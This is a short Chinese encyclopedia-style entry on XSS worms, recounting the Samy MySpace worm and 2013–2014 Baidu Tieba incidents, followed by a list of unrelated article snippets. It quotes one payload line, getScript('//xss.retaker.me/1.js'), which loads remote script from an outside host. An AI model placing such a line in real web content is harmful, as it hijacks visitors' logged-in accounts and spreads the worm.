XSS蠕虫

✍ dations ◷ 2025-02-23 16:59:18 #注入漏洞,蠕虫病毒

xss蠕虫(cross site scripting worm)是一种跨站病毒,通常由脚本语言Javascript写成,它借由网站访问者传播

历史第一个XSS蠕虫是针对网站Myspace的Samy,它在20小时内感染了100万个账户,作者Samy Kamkar之后被起诉

见对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

2013年5月19日, 百度贴吧转帖功能再度出现xss漏洞,大量贴吧内充斥接近满版面, 包含代码getScript('//xss.retaker.me/1.js')为标题的帖子,当已登陆用户打开这样的帖子,用户所持账户便以相同方式在多个贴吧转帖原作者的帖,部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染

2014年3月9日, 百度贴吧转帖功能再度出现xss漏洞

由于XSS蠕虫基于浏览器而不是操作系统,取决于其依赖网站的规模,它可以在短时间内达到对巨大数量的计算机感染

相关

  • 民权运动民权运动,是一个广泛的世界性的法律之前人人平等,争取平等公民权利的社会政治运动,它发生在1950年代至1980年代间,并在1960年代发展在高峰。许多情形下它是非暴力抵抗的民众抵抗
  • [7]超级卡带工业私人有限公司(暂定名称),(英语:Super Cassettes Industries Private Limited),又名T-Series是一家印度的音乐音乐录像带和电影公司,1983年由高尔杉·库玛尔(英语:Gulshan
  • 城市基础设施基建设施(英语:Infrastructure),亦称公共设施或公共建设,是指为社会生产和居民生活提供公共服务的物质工程设施,它是社会赖以生存发展的一般物质条件。基础设施不仅包括电网、通讯
  • 绍武绍武是南明绍武帝的年号,隆武二年(1646年)十一月绍武帝称帝后,预定于明年丁亥年(猪年,1647年)改元,十二月绍武政权覆亡,该年号实际并未使用。洪武 → 建文 → 永乐 → 洪熙 → 宣德
  • 人力资源管理人力资源管理是指为了完成管理工作中涉及人或人事方面的任务所进行的管理工作。人力资源管理工作包括:工作分析;制定人力需求计划以及人员招募;培训及开发;薪酬及福利管理、绩效
  • 19381938年大英帝国运动会是第3届大英帝国运动会。于1938年2月5日至12日在新南威尔士悉尼举行。共有15个国家或地区参加了运动会。澳大利亚获得奖牌榜第一位。
  • 七叶树狼獾德比七叶树狼獾德比(Buckeye Wolverine Rivalry),即密俄对抗(Michigan-Ohio State Rivalry)。是指美国NCAA的橄榄球比赛中,由俄亥俄州立大学七叶树队对阵密歇根大学狼獾队的比赛。俄亥
  • 加州州立大学萨克拉门托萨克拉门托加利福尼亚州立大学 (California State University, Sacramento;常用简称Sacramento State、Sac State、萨克拉门托加州州大;又常被译为加州州立大学萨克拉门托分校
  • 侧纹胡狼侧纹胡狼(Canis adustus)为哺乳纲食肉目犬科的一种。曾在20世纪初大量死亡,原因是因为犬瘟疫大量流行。毛皮呈灰黄色,腹部颜色浅,尾巴末端白色,体侧具有黑白条纹。全长95到120公分
  • 短尾獴短尾獴(学名 Herpestes brachyurus) 是生活在东南亚雨林的一种獴。短尾獴体色为红褐或黑色,四肢黑色,头部略灰,下巴有一小块无毛。一般体长60-65厘米(其中尾长约25厘米),体重约1.4公